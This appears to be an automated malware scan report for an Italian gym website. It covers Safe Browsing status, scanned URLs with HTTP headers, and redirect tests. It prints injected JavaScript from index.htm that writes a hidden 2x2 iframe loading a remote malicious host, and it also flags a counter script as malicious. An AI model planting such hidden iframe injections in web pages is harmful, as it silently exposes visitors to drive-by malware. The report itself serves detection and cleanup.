Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=palestremilano.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://palestremilano.org/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 12 Jan 2015 22:10:24 GMT Location: http://www.palestremilano.org/ Server: Apache Content-Length: 238 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.palestremilano.org/ | HTTP/1.1 200 OK Date: Mon, 12 Jan 2015 22:10:25 GMT Accept-Ranges: bytes ETag: "86c67b22e5fcd1:4495eb" Server: Microsoft-IIS/6.0 Content-Length: 4824 Content-Location: http://www.palestremilano.org/index.htm Content-Type: text/html Last-Modified: Wed, 11 Jul 2012 06:30:42 GMT MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET | clean |
http://www.palestremilano.org/index.htm | 200 OK Content-Length: 4824 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript">
document.write('<iframe src="http://slapfeatureladen.info/in.cgi?16" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>'); </script> Hidden iFrame found. size: 2x2 src: http://slapfeatureladen.info/in.cgi?16 <iframe src="http://slapfeatureladen.info/in.cgi?16" name="twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"> | ||
http://codicepro.shinystat.com/cgi-bin/getcod.cgi?USER=palestremilano&P=1 | 200 OK Content-Length: 4187 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- function cCk(nm,vl,mn){var ex=cdm="";var _sscdom="";if (_sscdom && _sscdom!="") { cdm=" domain="+_sscdom; if (mn) {document.cookie=nm+"=; expires=Thu, 01-Jan-70 00:00:01 GMT; path=/;";}}if (mn) {var d=new Date();d.setTime(d.getTime()+(mn*6*1000)); ex="; expires="+d.toGMTString();} document.cookie=nm+"="+vl+ex+"; path=/;"+cdm+"";} function rCk(nm){var nEQ=nm+"=";var ca=document.cookie.split(';');for(var i=0;i<ca.length;i++){var c=ca[i]; while(c.charAt(0)==' ') c=c.subst if (ssqS_.indexOf("NODW=yes")>-1){var ig_=new Image(1,1);ig_.src=ssqS_+"&RM="+Math.round(Math.random()*2147483647);ig_.onload=function(){_ssvoid();}} else{document.write("<a href=\"http://s2.shinystat.com/cgi-bin/shinystatv.cgi?USER="+us_+"&NH=1\" Target=\"_new\"><img src=\""+ssqS_+"\" border=\"0\"/></a>"); } Antivirus reports:
| ||
http://palestremilano.org/index.htm | HTTP/1.1 301 Moved Permanently Connection: close Date: Mon, 12 Jan 2015 22:10:25 GMT Location: http://www.palestremilano.org/index.htm Server: Apache Content-Length: 247 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.palestremilano.org/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: palestremilano.org
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 12 Jan 2015 22:10:24 GMT
Location: http://www.palestremilano.org/
Server: Apache
Content-Length: 238
Content-Type: text/html; charset=iso-8859-1
...238 bytes of data.
GET / HTTP/1.1
Host: palestremilano.org
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 12 Jan 2015 22:10:24 GMT
Location: http://www.palestremilano.org/
Server: Apache
Content-Length: 238
Content-Type: text/html; charset=iso-8859-1
...238 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: palestremilano.org
Referer: http://www.google.com/search?q=palestremilano.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: palestremilano.org
Referer: http://www.google.com/search?q=palestremilano.org
Result:
The result is similar to the first query. There are no suspicious redirects found.